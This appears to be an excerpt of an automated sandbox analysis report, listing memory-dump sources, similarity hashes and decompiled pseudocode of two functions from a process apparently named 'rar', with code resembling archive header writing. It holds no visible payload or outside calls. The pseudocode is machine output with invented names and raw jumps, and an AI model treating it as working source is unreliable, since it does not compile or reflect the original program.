                                                                                                            0x7ff650b18527
                                                                                                            0x7ff650b1853b
                                                                                                            0x7ff650b18541
                                                                                                            0x7ff650b18554
                                                                                                            0x7ff650b18557
                                                                                                            0x7ff650b1855a
                                                                                                            0x7ff650b18569
                                                                                                            0x7ff650b1856f
                                                                                                            0x7ff650b18579
                                                                                                            0x7ff650b1858a
                                                                                                            0x7ff650b18590
                                                                                                            0x7ff650b18595
                                                                                                            0x7ff650b18598
                                                                                                            0x7ff650b185a0
                                                                                                            0x7ff650b185ac
                                                                                                            0x7ff650b185b5
                                                                                                            0x7ff650b185b7
                                                                                                            0x7ff650b185bc
                                                                                                            0x7ff650b185bf
                                                                                                            0x7ff650b185c2
                                                                                                            0x7ff650b185c9
                                                                                                            0x7ff650b185ce
                                                                                                            0x7ff650b185d3
                                                                                                            0x7ff650b185d6
                                                                                                            0x7ff650b185d9
                                                                                                            0x7ff650b185e0
                                                                                                            0x7ff650b185e8
                                                                                                            0x7ff650b185f4
                                                                                                            0x7ff650b185ff
                                                                                                            0x7ff650b18603
                                                                                                            0x7ff650b1860a
                                                                                                            0x7ff650b1860c
                                                                                                            0x7ff650b18612
                                                                                                            0x7ff650b18619
                                                                                                            0x7ff650b1861c
                                                                                                            0x7ff650b1861e
                                                                                                            0x7ff650b18633
                                                                                                            0x7ff650b18635
                                                                                                            0x7ff650b1863b
                                                                                                            0x7ff650b18643
                                                                                                            0x7ff650b1864d
                                                                                                            0x7ff650b1865a
                                                                                                            0x7ff650b1865d
                                                                                                            0x7ff650b18663
                                                                                                            0x7ff650b18668
                                                                                                            0x7ff650b1866b
                                                                                                            0x7ff650b18674
                                                                                                            0x7ff650b1867c
                                                                                                            0x7ff650b186b0

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: CMT$3/
                                                                                                            • API String ID: 0-2239778108
                                                                                                            • Opcode ID: 040aca5051ca9e5ee0a3cacc34719ac4a0646a98f07c96ffb12671303277c4a6
                                                                                                            • Instruction ID: 2258688e205d39d194a90a36edb41f6189c6ce9c6daf2a7cb9ce8410f97b7adb
                                                                                                            • Opcode Fuzzy Hash: 040aca5051ca9e5ee0a3cacc34719ac4a0646a98f07c96ffb12671303277c4a6
                                                                                                            • Instruction Fuzzy Hash: 0991A332E1C6C3A2EA688B3591801F967A5FB56B80F084131DB5E63791CF3DF061C701
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B4D880 Relevance: 2.6, Strings: 2, Instructions: 129COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 70%
                                                                                                            			E00007FF67FF650B4D880(void* __ecx, void* __edx, void* __ebp, void* __eflags, void* __rax, long long __rbx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
				void* __rbp;
				signed char _t49;
				void* _t66;
				void* _t78;
				signed long long _t91;
				signed long long _t92;
				void* _t122;
				void* _t127;
				long long _t130;
				void* _t132;
				void* _t133;
				void* _t135;
				signed long long _t136;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t146;

				_t142 = __r9;
				_t129 = __rsi;
				_t66 = __ecx;
				 *((long long*)(_t135 + 8)) = __rbx;
				 *((long long*)(_t135 + 0x20)) = __rsi;
				_t133 = _t135 - 0x1f90;
				E00007FF67FF650B69CB0(0x2090, __rax, _t143, _t144);
				_t136 = _t135 - __rax;
				_t91 =  *0x50b978f0; // 0x27db226282f1
				_t92 = _t91 ^ _t136;
				 *(_t133 + 0x1f80) = _t92;
				_t94 = __r8;
				if (E00007FF67FF650B4A74C(_t92, __r8, __r8, __rsi, _t146) != 0) goto 0x50b4d8dd;
				_t139 = __r8;
				E00007FF67FF650B2CDD4(E00007FF67FF650B4A74C(_t92, __r8, __r8, __rsi, _t146));
				goto 0x50b4da7e;
				r8d = 0x800;
				E00007FF67FF650B5A390(_t133 + 0xf80, __r8, __r8);
				goto 0x50b4da5e;
				E00007FF67FF650B31C28(_t136 + 0x40);
				r8d = 0;
				if (E00007FF67FF650B321C0(_t92, __r8, _t136 + 0x40, _t133 + 0xf80) != 0) goto 0x50b4d92f;
				E00007FF67FF650B2CB04(_t66, 0x50ba7ab8, _t133 + 0xf80);
				goto 0x50b4da54;
				r9d = 0;
				r8b = 1;
				if (E00007FF67FF650B5D040() == 0) goto 0x50b4da74;
				E00007FF67FF650B54598(0xd68, _t78, _t94, _t129, _t133, _t139);
				_t122 = _t133 + 0xf80;
				E00007FF67FF650B283F0(_t92, _t122, _t139, _t142, _t127);
				E00007FF67FF650B283F0(L"     ", _t122, _t139, _t142, _t132);
				_t12 = _t122 + 2; // 0x2
				r8d = _t12;
				E00007FF67FF650B32730(0xd68, 0, E00007FF67FF650B5D040(), _t92, _t136 + 0x40, _t122, _t139);
				E00007FF67FF650B32890(0, _t94, _t136 + 0x40, _t129);
				_t15 = _t92 - 4; // -4
				_t130 = _t15;
				r8d = 0;
				E00007FF67FF650B32730(0xd68, 0, E00007FF67FF650B5D040(), _t92, _t136 + 0x40, _t130, _t139);
				_t49 = E00007FF67FF650B32138(_t136 + 0x40);
				if (8 - 0x20 < 0) goto 0x50b4d9a2;
				asm("sbb ecx, ecx");
				 *((intOrPtr*)(_t136 + 0x28)) = 4;
				 *((long long*)(_t136 + 0x20)) = _t130;
				r9d = 1;
				r8d = 0;
				E00007FF67FF650B32BDC(0, _t136 + 0x40, _t136 + 0x30, _t130, _t139);
				if ((_t49 & 0x000000ff) << 0 !=  *((intOrPtr*)(_t136 + 0x30))) goto 0x50b4da16;
				E00007FF67FF650B54598(0xd26, (_t49 & 0x000000ff) << 0, _t94, _t130, _t133, _t139);
				E00007FF67FF650B283F0(L"%s%s ", 0x50b84a88, _t92, _t142);
				goto 0x50b4da3f;
				E00007FF67FF650B2CC24(E00007FF67FF650B112C8(3, _t133 + 0xf80, _t133 + 0xf80), 3, (_t49 & 0x000000ff) << 0 -  *((intOrPtr*)(_t136 + 0x30)), 0x50ba7ab8);
				r8d = 0;
				E00007FF67FF650B44E90(3, 0x800, _t92, _t94, _t133 + 0xf80, _t130, _t133);
				E00007FF67FF650B31C70(_t136 + 0x40);
				if (E00007FF67FF650B3345C() != 0) goto 0x50b4d8f4;
				goto 0x50b4da7e;
				return E00007FF67FF650B69D10(E00007FF67FF650B31C70(_t136 + 0x40), 3,  *(_t133 + 0x1f80) ^ _t136);
			}




















                                                                                                            0x7ff650b4d880
                                                                                                            0x7ff650b4d880
                                                                                                            0x7ff650b4d880
                                                                                                            0x7ff650b4d880
                                                                                                            0x7ff650b4d885
                                                                                                            0x7ff650b4d88e
                                                                                                            0x7ff650b4d89b
                                                                                                            0x7ff650b4d8a0
                                                                                                            0x7ff650b4d8a3
                                                                                                            0x7ff650b4d8aa
                                                                                                            0x7ff650b4d8ad
                                                                                                            0x7ff650b4d8b4
                                                                                                            0x7ff650b4d8c7
                                                                                                            0x7ff650b4d8c9
                                                                                                            0x7ff650b4d8d3
                                                                                                            0x7ff650b4d8d8
                                                                                                            0x7ff650b4d8dd
                                                                                                            0x7ff650b4d8ea
                                                                                                            0x7ff650b4d8ef
                                                                                                            0x7ff650b4d8f9
                                                                                                            0x7ff650b4d8ff
                                                                                                            0x7ff650b4d915
                                                                                                            0x7ff650b4d925
                                                                                                            0x7ff650b4d92a
                                                                                                            0x7ff650b4d92f
                                                                                                            0x7ff650b4d932
                                                                                                            0x7ff650b4d945
                                                                                                            0x7ff650b4d950
                                                                                                            0x7ff650b4d958
                                                                                                            0x7ff650b4d95f
                                                                                                            0x7ff650b4d96b
                                                                                                            0x7ff650b4d972
                                                                                                            0x7ff650b4d972
                                                                                                            0x7ff650b4d97b
                                                                                                            0x7ff650b4d985
                                                                                                            0x7ff650b4d98a
                                                                                                            0x7ff650b4d98a
                                                                                                            0x7ff650b4d98e
                                                                                                            0x7ff650b4d999
                                                                                                            0x7ff650b4d9a7
                                                                                                            0x7ff650b4d9bb
                                                                                                            0x7ff650b4d9c6
                                                                                                            0x7ff650b4d9cd
                                                                                                            0x7ff650b4d9d1
                                                                                                            0x7ff650b4d9d6
                                                                                                            0x7ff650b4d9dc
                                                                                                            0x7ff650b4d9e9
                                                                                                            0x7ff650b4d9f2
                                                                                                            0x7ff650b4d9f9
                                                                                                            0x7ff650b4da0f
                                                                                                            0x7ff650b4da14
                                                                                                            0x7ff650b4da3a
                                                                                                            0x7ff650b4da3f
                                                                                                            0x7ff650b4da4e
                                                                                                            0x7ff650b4da59
                                                                                                            0x7ff650b4da6c
                                                                                                            0x7ff650b4da72
                                                                                                            0x7ff650b4daa4

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $%s%s
                                                                                                            • API String ID: 0-4212163154
                                                                                                            • Opcode ID: b7718ca5adae2486ba45ade6079d0ab6fe10669b68626feb86237f9b7376d747
                                                                                                            • Instruction ID: a9b0ce341e74e4df4b216e9937e13689799880ecc853af281b8ceb03239c7d5d
                                                                                                            • Opcode Fuzzy Hash: b7718ca5adae2486ba45ade6079d0ab6fe10669b68626feb86237f9b7376d747
                                                                                                            • Instruction Fuzzy Hash: F3515421A1858376FB60EB15D8D11FD2311EF96344F985032EA4FE7B96DE2EEA05C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B1B4D8 Relevance: 2.0, APIs: 1, Instructions: 508COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 67%
                                                                                                            			E00007FF67FF650B1B4D8(void* __edx, void* __rax, intOrPtr* __rcx, void* __rdx, void* __r8, long long __r10, void* __r11) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t237;
				signed int _t238;
				void* _t240;
				intOrPtr _t297;
				void* _t302;
				signed short _t316;
				void* _t350;
				void* _t351;
				void* _t360;
				void* _t370;
				signed long long _t422;
				long long _t425;
				signed int* _t426;
				signed int* _t428;
				long long _t429;
				void* _t431;
				void* _t433;
				void* _t435;
				void* _t447;
				long long _t492;
				intOrPtr* _t516;
				long long _t517;
				signed long long _t519;
				signed int* _t521;
				intOrPtr* _t522;
				void* _t523;
				void* _t524;
				void* _t525;
				void* _t526;
				void* _t527;
				signed long long _t528;
				long long _t542;
				void* _t543;
				void* _t545;
				void* _t546;
				void* _t549;

				_t543 = __r11;
				_t542 = __r10;
				_t526 = _t527 - 0x37f8;
				E00007FF67FF650B69CB0(0x38f8, __rax, __r10, __r11);
				_t528 = _t527 - __rax;
				_t422 =  *0x50b978f0; // 0x27db226282f1
				 *(_t526 + 0x37e0) = _t422 ^ _t528;
				r13b = r9b;
				_t546 = __r8;
				r14d = __edx;
				_t522 = __rcx;
				if (r9b != 0) goto 0x50b1b530;
				_t425 =  *((intOrPtr*)( *__rcx + 0x28));
				 *0x50b80550();
				 *((long long*)(__rcx + 0x7f68)) = _t425;
				_t516 = __rcx + 0x7f78;
				 *((long long*)(_t526 - 0x70)) = _t516;
				if ( *_t516 != 3) goto 0x50b1b560;
				 *((char*)(_t528 + 0x20)) =  *((intOrPtr*)(_t526 + 0x3860));
				r9b = r13b;
				_t531 = __r8;
				E00007FF67FF650B1AAF8(r14d, _t425, __rcx, __r8, _t542, _t543);
				goto 0x50b1bca6;
				_t9 = _t425 + 6; // 0x7a
				r12d = _t9;
				if (r14d == 0x74) goto 0x50b1b579;
				if (r14d != r12d) goto 0x50b1b57f;
				_t10 = _t425 - 0x71; // 0x3
				r14d = _t10;
				goto 0x50b1b57f;
				r14d = 2;
				E00007FF67FF650B48E10(_t425, _t528 + 0x58);
				r11d = 4;
				r8d = _t543 + 4;
				r10d = 0;
				if ( *((intOrPtr*)(__rcx + 0x7f84)) == r10b) goto 0x50b1b61e;
				if (r13b != 0) goto 0x50b1b61e;
				if (r14d == 0) goto 0x50b1bc5c;
				if (r14d == 1) goto 0x50b1bb68;
				_t14 = _t522 + 0x7f92; // 0x7f94
				_t429 = _t14;
				_t15 = _t522 + 0x1040; // 0x1042
				_t517 = _t15;
				_t540 =  *((intOrPtr*)(__rcx + 0x22d8)) + 0x6030;
				 *((long long*)(_t528 + 0x40)) = _t542;
				 *((long long*)(_t528 + 0x38)) = _t542;
				 *(_t528 + 0x30) = r10d;
				 *((long long*)(_t528 + 0x28)) = _t542;
				 *((long long*)(_t528 + 0x20)) = _t429;
				r8d = r11d;
				E00007FF67FF650B28FF0(1, _t429, _t517,  *((intOrPtr*)(__rcx + 0x22d8)) + 0x6030);
				r8d = 8;
				_t492 = _t429;
				E00007FF67FF650B329C4(_t302, 1, _t350, _t425, _t429, __rcx, _t492, _t531);
				 *((long long*)(_t526 - 0x78)) = _t517;
				r10d = 0;
				_t24 = _t542 + 4; // 0x4
				r11d = _t24;
				_t25 = _t542 + 8; // 0x8
				r8d = _t25;
				_t360 = r14d;
				if (_t360 == 0) goto 0x50b1bc5c;
				if (_t360 == 0) goto 0x50b1bb68;
				if (_t360 == 0) goto 0x50b1b734;
				if (_t360 == 0) goto 0x50b1b734;
				if (r14d - 0xffffffffffffffff != 2) goto 0x50b1bc9c;
				_t26 = _t522 + 0x5840; // 0x5842
				_t431 =  !=  ? _t546 : _t26;
				 *((long long*)(_t431 + 4)) = _t492;
				if ( *((intOrPtr*)(_t431 + 0x10)) == r10b) goto 0x50b1b674;
				 *(_t431 + 8) = 0x4000;
				if ( *((intOrPtr*)(_t431 + 0x1c)) == r10b) goto 0x50b1b680;
				 *(_t431 + 8) = 0x4000;
				if ( *((intOrPtr*)(_t431 + 0x1d)) == r10b) goto 0x50b1b68c;
				 *(_t431 + 8) = 0x4000;
				if ( *((intOrPtr*)(_t431 + 0x1e)) == r10b) goto 0x50b1b698;
				 *(_t431 + 8) = 0x4000;
				if ( *((intOrPtr*)(_t431 + 0x1f)) == r10b) goto 0x50b1b6a4;
				 *(_t431 + 8) = 0x4003 | r11d | r8d;
				E00007FF67FF650B48EE8(_t431, _t528 + 0x58, _t492, _t531);
				E00007FF67FF650B48F20(_t431, _t528 + 0x58, _t492, _t531);
				E00007FF67FF650B48F20(_t431, _t528 + 0x58, _t492, _t531);
				r14d = 0;
				if ( *((intOrPtr*)(_t431 + 0x1d)) == r14b) goto 0x50b1b6de;
				E00007FF67FF650B48F70(r14d - 0xffffffffffffffff, _t431, _t528 + 0x58, _t492, _t531);
				if ( *((intOrPtr*)(_t431 + 0x1f)) == r14b) goto 0x50b1b6f1;
				E00007FF67FF650B48F20(_t431, _t528 + 0x58, _t492, _t531);
				_t370 =  *((intOrPtr*)(_t431 + 0x1e)) - r14b;
				if (_t370 == 0) goto 0x50b1b70e;
				E00007FF67FF650B48EE8(_t431, _t528 + 0x58, _t492, _t531);
				_t519 =  *((intOrPtr*)(_t526 - 0x70)) - 1;
				if (_t370 != 0) goto 0x50b1b6fc;
				_t523 =  !=  ? _t545 : _t522;
				_t426 =  *((intOrPtr*)(_t526 - 0x70));
				r8d =  *_t426;
				r9d = 0;
				_t447 = _t528 + 0x58;
				 *((intOrPtr*)(_t431 + 0xc)) = E00007FF67FF650B49174(r14d - 0xffffffffffffffff, 0, _t431, _t447, _t523, _t519, _t523, _t526, _t540);
				goto 0x50b1bc9c;
				_t304 =  ==  ? 0x3518 : 0x5880;
				_t433 =  !=  ? _t546 : _t431 + _t523;
				r12d =  ==  ? 0x74 : r12d;
				 *((intOrPtr*)(_t433 + 4)) = r12d;
				 *(_t433 + 8) = 0x8000;
				 *(_t433 + 0x10a4) = r10d;
				if ( *((intOrPtr*)(_t433 + 0x10)) == r10b) goto 0x50b1b77d;
				 *(_t433 + 8) = 0xc000;
				if ( *((intOrPtr*)(_t433 + 0x10a8)) == r10b) goto 0x50b1b78c;
				 *(_t433 + 8) = 0xc000;
				if ( *((intOrPtr*)(_t433 + 0x10a9)) == r10b) goto 0x50b1b79b;
				 *(_t433 + 8) = 0xc000;
				if ( *((intOrPtr*)(_t433 + 0x10ab)) == r10b) goto 0x50b1b7aa;
				 *(_t433 + 8) = 0xc000;
				if ( *((intOrPtr*)(_t433 + 0x1101)) == r10b) goto 0x50b1b7bd;
				 *(_t433 + 8) = 0xc003 | r11d | 0x000000e0;
				goto 0x50b1b7e1;
				goto 0x50b1b7d3;
				if (_t447 + _t447 -  *((intOrPtr*)(_t433 + 0x1108)) < 0) goto 0x50b1b7ce;
				 *(_t433 + 8) =  *(_t433 + 8) | r10d + 0x00000001 << 0x00000005;
				_t237 =  *(_t433 + 8);
				if ( *((intOrPtr*)(_t433 + 0x10b0)) == r10b) goto 0x50b1b7f1;
				asm("bts eax, 0xa");
				 *(_t433 + 8) = _t237;
				if ( *((intOrPtr*)(_t433 + 0x1111)) == r10b) goto 0x50b1b801;
				asm("bts eax, 0x8");
				 *(_t433 + 8) = _t237;
				if ( *((intOrPtr*)(_t433 + 0x1100)) != r10b) goto 0x50b1b813;
				if ( *((intOrPtr*)(_t433 + 0x1112)) == r10b) goto 0x50b1b819;
				_t238 = _t237 | 0x00000010;
				 *(_t433 + 8) = _t238;
				r15d = 0x800;
				if ( *((intOrPtr*)(_t433 + 0x1103)) == r10b) goto 0x50b1b82e;
				 *(_t433 + 8) = _t238 | r15d;
				if ( *((intOrPtr*)(_t433 + 0x1110)) == r10b) goto 0x50b1b844;
				if (r14d == 2) goto 0x50b1b844;
				 *((intOrPtr*)(_t433 + 0x24)) = 0x80000000;
				_t83 = _t433 + 0x28; // 0x58a8
				_t240 = E00007FF67FF650B59F60(_t83,  *((intOrPtr*)(_t433 + 0x1108)));
				 *((char*)(_t528 + 0x50)) = _t240 == 0;
				if (_t240 != 0) goto 0x50b1b85d;
				asm("bts dword [ebx+0x8], 0x9");
				_t86 = _t433 + 0x28; // 0x58a8
				E00007FF67FF650B452DC(_t240, _t240, _t86, _t526 + 0x7e0, _t546, _t540);
				if (r14d != 2) goto 0x50b1b885;
				E00007FF67FF650B1C2E4(_t433, _t523, _t526 + 0x7e0);
				E00007FF67FF650B5D390( ==  ? 0x3518 : 0x5880, _t433, _t526 + 0x7e0, _t526 - 0x20, _t546);
				CharToOemA(??, ??);
				_t521 = (_t519 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t526 - 0x20 + _t521)) != 0) goto 0x50b1b8b0;
				r12d = 0;
				if (r14d != 2) goto 0x50b1b8fc;
				if ( *((intOrPtr*)(_t528 + 0x50)) == 0) goto 0x50b1b8fc;
				E00007FF67FF650B2C2F0(_t426, _t526 - 0x40);
				_t541 = _t526 + 0x17e0;
				_t534 = _t526 + 0x7e0;
				E00007FF67FF650B2C558(_t433, _t526 - 0x40, _t526 - 0x20, _t526 + 0x7e0, _t526 + 0x17e0);
				_t100 =  &(_t426[0]); // 0x1
				_t310 = _t100;
				_t549 = _t100 + _t521;
				 *(_t526 - 0x68) = _t426;
				 *(_t526 - 0x60) = _t426;
				 *(_t526 - 0x58) = _t426;
				 *(_t526 - 0x50) = _t426;
				 *((char*)(_t526 - 0x48)) = 0;
				if (r14d != 2) goto 0x50b1b94d;
				 *((long long*)(_t528 + 0x28)) = _t526 - 0x68;
				 *((intOrPtr*)(_t528 + 0x20)) =  *((intOrPtr*)(_t523 + 0x22fc));
				r9d =  *((intOrPtr*)(_t523 + 0x22f8));
				r8d =  *(_t523 + 0x22f4);
				E00007FF67FF650B1941C(_t433, _t433, _t521, _t523);
				if ( *(_t526 - 0x60) == 0) goto 0x50b1b94d;
				asm("bts dword [ebx+0x8], 0xc");
				 *(_t433 + 0x14) =  *(_t433 + 0x1068);
				_t501 =  *((intOrPtr*)(_t433 + 4));
				E00007FF67FF650B48EE8(_t433, _t528 + 0x58,  *((intOrPtr*)(_t433 + 4)), _t526 + 0x7e0);
				E00007FF67FF650B48F20(_t433, _t528 + 0x58,  *((intOrPtr*)(_t433 + 4)), _t526 + 0x7e0);
				E00007FF67FF650B48F20(_t433, _t528 + 0x58,  *((intOrPtr*)(_t433 + 4)), _t526 + 0x7e0);
				E00007FF67FF650B48F70(_t100, _t433, _t528 + 0x58,  *((intOrPtr*)(_t433 + 4)), _t526 + 0x7e0);
				if ( *((char*)(_t433 + 0x10aa)) != 0) goto 0x50b1b9a1;
				 *((char*)(_t433 + 0x18)) = (E00007FF67FF650B48F70(_t100, _t433, _t528 + 0x58,  *((intOrPtr*)(_t433 + 4)), _t534) & 0xffffff00 |  *((intOrPtr*)(_t433 + 0x1114)) == 0x00000001) + 0x00000002 & 0x000000ff;
				E00007FF67FF650B48EE8(_t433, _t528 + 0x58, _t501, _t534);
				E00007FF67FF650B48F70(_t100, _t433, _t528 + 0x58, _t501, _t534);
				_t133 = _t433 + 0x1050; // 0x68d0
				if ( *_t133 == 0) goto 0x50b1b9eb;
				E00007FF67FF650B5B564();
				goto 0x50b1b9ed;
				E00007FF67FF650B48F70(_t100, _t433, _t528 + 0x58, _t501, _t534);
				E00007FF67FF650B48EE8(_t433, _t528 + 0x58, _t501, _t534);
				E00007FF67FF650B48EE8(_t433, _t528 + 0x58, _t501, _t534);
				E00007FF67FF650B48F20(_t433, _t528 + 0x58, _t549, _t534);
				E00007FF67FF650B48F70(_t310, _t433, _t528 + 0x58, _t549, _t534);
				if (( *(_t433 + 8) & 0x00000100) == 0) goto 0x50b1ba7e;
				E00007FF67FF650B48F70(_t310, _t433, _t528 + 0x58,  *(_t433 + 0x1068) >> 0x20, _t534);
				r15d = 0;
				if ( *((intOrPtr*)(_t433 + 0x10aa)) == r15b) goto 0x50b1ba6f;
				E00007FF67FF650B48F70(_t310, _t433, _t528 + 0x58,  *(_t433 + 0x1068) >> 0x20, _t534);
				goto 0x50b1ba81;
				goto 0x50b1ba68;
				r15d = r15d ^ r15d;
				E00007FF67FF650B49024(_t433, _t528 + 0x58, _t526 - 0x20, _t523, _t521, _t526 + 0x17e0);
				if (r14d != 2) goto 0x50b1bab7;
				if ( *((intOrPtr*)(_t528 + 0x50)) == r15b) goto 0x50b1bad4;
				E00007FF67FF650B48EE8(_t433, _t528 + 0x58, _t526 - 0x20, _t521);
				goto 0x50b1baca;
				if ( *((intOrPtr*)(_t433 + 0x1030)) == 0) goto 0x50b1bad4;
				E00007FF67FF650B49024(_t433, _t528 + 0x58,  *((intOrPtr*)(_t433 + 0x1028)), _t523,  *((intOrPtr*)(_t433 + 0x1030)), _t526 + 0x17e0);
				if (( *(_t433 + 8) & 0x00000400) == 0) goto 0x50b1baf4;
				_t161 = _t433 + 0x10b1; // 0x6931
				r8d = 8;
				E00007FF67FF650B49024(_t433, _t528 + 0x58, _t161, _t523,  *((intOrPtr*)(_t433 + 0x1030)), _t526 + 0x17e0);
				if (( *(_t433 + 8) & 0x00001000) == 0) goto 0x50b1bb0f;
				_t538 =  *(_t526 - 0x60);
				E00007FF67FF650B49024(_t433, _t528 + 0x58,  *(_t526 - 0x68), _t523,  *(_t526 - 0x60), _t526 + 0x17e0);
				if (r14d != 2) goto 0x50b1bb20;
				E00007FF67FF650B1A8D4(_t433, _t523, _t433);
				_t524 =  !=  ? _t549 : _t523;
				r9d = 0;
				_t428 =  *((intOrPtr*)(_t526 - 0x70));
				r8d =  *_t428;
				 *((intOrPtr*)(_t433 + 0xc)) = E00007FF67FF650B49174(_t310, 0, _t433, _t528 + 0x58, _t524, _t521, _t524, _t526, _t541);
				if ( *(_t526 - 0x68) == 0) goto 0x50b1bb63;
				if ( *((intOrPtr*)(_t526 - 0x48)) == r15b) goto 0x50b1bb5d;
				_t514 =  *(_t526 - 0x58);
				E00007FF67FF650B57B7C(_t310, 7, _t351,  *(_t526 - 0x68),  *(_t526 - 0x58), _t521);
				0x50b6edd8();
				goto 0x50b1bc9c;
				_t176 = _t524 + 0x34a0; // 0x34a2
				_t435 =  !=  ? _t549 : _t176;
				r9d = 0x73;
				 *((intOrPtr*)(_t435 + 4)) = r9d;
				_t282 = r10d & 0xffffff00 |  *((intOrPtr*)(_t524 + 0x7f7d)) != r10b;
				_t341 =  ==  ? r10d & 0xffffff00 |  *((intOrPtr*)(_t524 + 0x7f7d)) != r10b : _t282 & 0x0000ffff | r8w;
				_t313 =  ==  ?  ==  ? r10d & 0xffffff00 |  *((intOrPtr*)(_t524 + 0x7f7d)) != r10b : _t282 & 0x0000ffff | r8w : _t341 & 0x0000ffff | 0x00000100;
				_t183 = _t428 - 0x80; // 0x80
				_t286 =  ==  ?  ==  ?  ==  ? r10d & 0xffffff00 |  *((intOrPtr*)(_t524 + 0x7f7d)) != r10b : _t282 & 0x0000ffff | r8w : _t341 & 0x0000ffff | 0x00000100 : _t313 & 0x0000ffff | _t183;
				_t316 =  ==  ?  ==  ?  ==  ?  ==  ? r10d & 0xffffff00 |  *((intOrPtr*)(_t524 + 0x7f7d)) != r10b : _t282 & 0x0000ffff | r8w : _t341 & 0x0000ffff | 0x00000100 : _t313 & 0x0000ffff | _t183 : ( ==  ?  ==  ?  ==  ? r10d & 0xffffff00 |  *((intOrPtr*)(_t524 + 0x7f7d)) != r10b : _t282 & 0x0000ffff | r8w : _t341 & 0x0000ffff | 0x00000100 : _t313 & 0x0000ffff | _t183) & 0x0000ffff | 0x00000040;
				r8d = _t316 & 0x0000ffff;
				r8w = r8w | r11w;
				r8w =  ==  ? _t316 : r8w;
				_t289 =  ==  ? r8w : r8w & 0xffffffff | 0x00000010;
				_t290 = ( ==  ? r8w : r8w & 0xffffffff | 0x00000010) & 0x0000ffff;
				 *(_t435 + 8) = ( ==  ? r8w : r8w & 0xffffffff | 0x00000010) & 0x0000ffff;
				E00007FF67FF650B48EE8(_t435, _t528 + 0x58,  *(_t526 - 0x58),  *(_t526 - 0x60));
				E00007FF67FF650B48F20(_t435, _t528 + 0x58,  *(_t526 - 0x58),  *(_t526 - 0x60));
				E00007FF67FF650B48F20(_t435, _t528 + 0x58,  *(_t526 - 0x58),  *(_t526 - 0x60));
				E00007FF67FF650B48F20(_t435, _t528 + 0x58,  *(_t526 - 0x58),  *(_t526 - 0x60));
				E00007FF67FF650B48F70(_t316, _t435, _t528 + 0x58, _t514, _t538);
				_t525 =  !=  ? _t428 : _t524;
				r8d =  *_t521;
				goto 0x50b1b71c;
				_t198 = _t525 + 0x3490; // 0x3492
				 *_t198 = 0x52;
				_t297 =  *0x50b80ccc; // 0x1a217261
				 *((intOrPtr*)(_t525 + 0x3491)) = _t297;
				 *((short*)(_t525 + 0x3495)) =  *0x50b80cd0 & 0x0000ffff;
				 *(_t525 + 0x3498) = 7;
				if (r13b != 0) goto 0x50b1bc9c;
				r8d = 7;
				E00007FF67FF650B329C4( ==  ? 0x3518 : 0x5880,  *((intOrPtr*)(_t435 + 0x18)), _t350, _t428, _t435, _t525, _t198, _t538);
				return E00007FF67FF650B69D10(E00007FF67FF650B11534(_t528 + 0x58), _t316,  *(_t526 + 0x37e0) ^ _t528);
			}











































